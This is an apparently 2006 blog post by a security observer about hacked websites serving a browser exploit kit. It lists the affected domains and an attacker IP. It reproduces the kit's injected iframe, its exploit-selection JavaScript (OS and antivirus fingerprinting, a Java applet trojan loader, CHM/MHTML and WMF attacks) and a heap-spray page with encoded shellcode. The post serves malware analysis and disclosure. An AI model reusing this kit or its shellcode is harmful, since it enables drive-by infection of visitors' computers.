Monday, April 17, 2006

Malicious site? or hacked site?

At-risk user behavior, or innocent user behavior?

2hjb.net downloads ms0311.jar, which includes Installer.class, which includes an exploit of the vulnerability addressed by the Micorosft Java Virtual Machine security update security bulletin MS03-011.

www.2hjb.net/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.2hjb.net/ie0604.htm
www.2hjb.net/cgi-bin/ie0604.cgi?bug=MS03-11&SP1

2hjb.net had been registered the day before. It is apparently a Lithuanian
job placement company. Owned by Robin Lee of Emeryville, CA? This sounds
suspicious.

Similarly, lauritoandlaurito.com and telecarrier.es deliver ms0311.jar.

lauritoandlaurito.com/ms0311.jar (Installer.class) JAVA_BYTEVER.BE

Laurito & Laurito, LLC (Law firm specializing in foreclosures in Ohio.
Also one of Ohio's top real estate firms. Go figure.)

www.telecarrier.es/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.telecarrier.es/ms0311.jar (TakePrivileges.class) JAVA_BYTEVER.BE
www.telecarrier.es/ie0604.htm
www.telecarrier.es/cgi-bin/ie0604.cgi?exploit=MS03-11

Telecarrier S.L. (Spain's telecommunications giant)

Similarly, the web site of "Performance Cycle of Colorado" (www[.]performancecycle.com) will connect to 66.36.240.109/ie0604.htm which kicks in 66.36.240.109/cgi-bin/ie0604.cgi?bug=0day&SP2 and 66.36.240.109/cgi-bin/ie0604.cgi?exploit=0day

66.36.240.109/cgi-bin/ie0604.cgi is something called "Web-Attacker Control panel". The prompt says "Please enter the password to access the statistics".

A person whose web site was similarly hacked reports that this code was added to their web page:

<iframe src='http://66.36.240.109/ie0601.htm' width=1 height=1></iframe>

It displays a page saying under construction, which then redirects to an annoying little javascript window, which locks up your browser.
I looked at the code of the 'Under Construction' page- It is as follows:

<HTML xmlns:IE>

<TITLE>Demo page</TITLE>

<HEAD>

<STYLE type='text/css'>

IE\:clientCaps {behavior:url(#default#clientcaps)}

</STYLE>

</HEAD>

<BODY onLoad="setTimeout('Run_BOF()',2000);">

<CENTER><H1>This site is under construction...</H1></CENTER>


<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>

<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>

<DIV id="ObjectContainer"></DIV>

<IE:clientCaps ID="oClientCaps" />

<script type="text/javascript" language="JavaScript">



var ExploitNumber=0;



function GetVersion(CLSID)

{

if (oClientCaps.isComponentInstalled(CLSID,"Component ID"))

{return oClientCaps.getComponentVersion(CLSID,"ComponentID ").split(",");}

else

{return Array(0,0,0,0);}

}


function Get_Win_Version(IE_vers)

{

if (IE_vers.indexOf('Windows 95') != -1) return "95"

else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"

else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"

else if (IE_vers.indexOf('Windows 98') != -1) return "98"

else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"

else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"

else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

}



function Run_BOF()

{

if (ExploitNumber==4)

{

self.focus();

for (i=1 ; i <=4 ; i++)

{

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');

}

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');

}

}



var CGI_Script="
http://66.36.240.109/cgi-bin/ie0601.cgi";



if (navigator.appName=="Microsoft Internet Explorer")

{

Click_Request=CGI_Script+"?click";

var InetPath=document.location.href;

j=InetPath.lastIndexOf('/');

InetPath=InetPath.slice(0,j);



var IEversion=navigator.appVersion;

var IEplatform=navigator.platform;

if (IEplatform.search("Win32") != -1)

{

var WinOS=Get_Win_Version(IEversion);

FullVersion=clientInformation.appMinorVersion;

PatchList=FullVersion.split(";");

for (var i=0; i < PatchList.length; i++)

{

ServicePack=PatchList[i];

j=ServicePack.indexOf('SP');

if (j != -1)

{

ServicePack=ServicePack.substr(j);

Click_Request=Click_Request+'&'+ServicePack;

}

}

StatPage.location=Click_Request;

var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");

fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;

try

{

var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization

fNortonAV=1;

}

catch(e){}

try

{

var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization

fMcAfee=1;

}

catch(e){}


switch (WinOS)

{

case "2K":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=2; }

}

break;

case "2K3":

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

break;

case "XP":



if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

for (var i=0; i < PatchList.length; i++)

{

if (PatchList[i]=="SP2")

{ XP_SP2_patched=1; }



}

if (XP_SP2_patched==0)

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

}

else

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=5; }

else

{ ExploitNumber=4; }

}

}

break;

default:

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else

{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher



break;

}

// launching exploit which number is depends on Windows and IE versions



switch (ExploitNumber)

{

case 1:

Trojan_Path=CGI_Script+"?exploit=MS03-11";

ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';

break;

case 2:

CHM_base='//ie0601b.chm'+'::'+'/main.htm';

Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");

Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;

oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");

document.body.appendChild(oMSITS);

document.title="Loaded !";

break;

case 3:

window.open("ie0601c.htm","Info","left=2000,top=20 00,screenX=2000,screenY=2000,width=50,height=50,sc rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0 ");

self.focus();

break;

case 4:

;setTimeout('Run_BOF()',2000);

break;

case 5:

PageContainer.location="ie0601e.wmf";

break;

default:

break;

}


}

}

else if (navigator.appName=="Netscape")

{

StatPage.location=CGI_Script+"?click";

if (navigator.userAgent.indexOf('Firefox') != -1)

{

PageContainer.location="mfsa0601.htm";

}

}

else

{

StatPage.location=CGI_Script+"?click";

}

</script>

</BODY>

</HTML>




The page it redirects to (for me, anyhow) has code as follows:



<HTML><HEAD><SCRIPT language="javascript">

function SpreadShellCode() {

var i = 0;

var eip = "";

var mem_block = "";

for (i=1 ; i <=500 ; i++)

{eip = eip + unescape("%u7030")+unescape("%u4300");}

var init_shellcode = "";

var main_shellcode = "";

var full_shellcode = "";

for (i=1 ; i<=200; i++)

{mem_block = mem_block + eip;}

init_shellcode=unescape("%u9090%u9090%u9090%u42ba% u4241%u8141%u11f2%u1111%u4111%u1139%ufb75%uf18b%uf 88b%u3357%u66c9%u25b9%ufc01%ua4f3%uff5f%u90e7");

main_shellcode=unescape("%u5053%u5053%u3390%u33c0% uebc9%u5e12%ub966%u0103%ufe8b%u2e80%u8005%u0336%ue 246%uebf7%ue805%uffe9%uffff%u5ced%u7b8d%u8d44%u327 c%u0580%u5afb%u7a8d%u0528%u35fb%u4fcf%ub347%udd35% u113a%u1cc2%u4030%u7cf6%uc710%u13cd%ude05%ued48%u3 df1%u7be1%u62e9%u628d%u052c%u6ae3%u148d%u8d4d%u246 2%ue305%u0c8d%u058d%uc5cb%u565b%u5354%u5251%u4c32% u5454%u4508%u643e%u3279%u806b%u086b%uc835%u056c%u3 848%u1480%u488d%u8d14%u2478%u8db3%u1048%u0fed%u488 d%u933c%u8448%u488d%u9b44%u92c1%u1252%uf0f4%u018c% u0101%uf485%u850c%u2c34%u0144%u9bd8%uc158%u1e3a%u7 831%u71f0%u0101%u8d01%u2c5c%u9304%ube56%udd35%u555 5%ued56%u552c%ud801%uc163%u02a0%u128e%u55f0%u0101% u8501%u0cf4%u3485%u662c%ud801%u82c1%ue6e0%uf075%u0 148%u0101%u0156%uf0d8%u01d9%u0101%u7c70%u787c%u313 e%u3a31%u323a%u3a35%u3632%u383c%u3732%u3f38%u6531% u6f69%u6633%u726f%u6f31%u386b%u383a%u3237%u6965%u4 16f%u806b%u7478%u6f71%u437c%u5553%u3b38%u3833%u3c3 b%u0008");

full_shellcode = init_shellcode+main_shellcode;

mem_block = mem_block+full_shellcode;

prompt(mem_block,"Javascript initialized");

}

</SCRIPT></HEAD>

<BODY onload="setTimeout('SpreadShellCode()',2000)"></BODY></HTML>





These web sites were probably poisoned.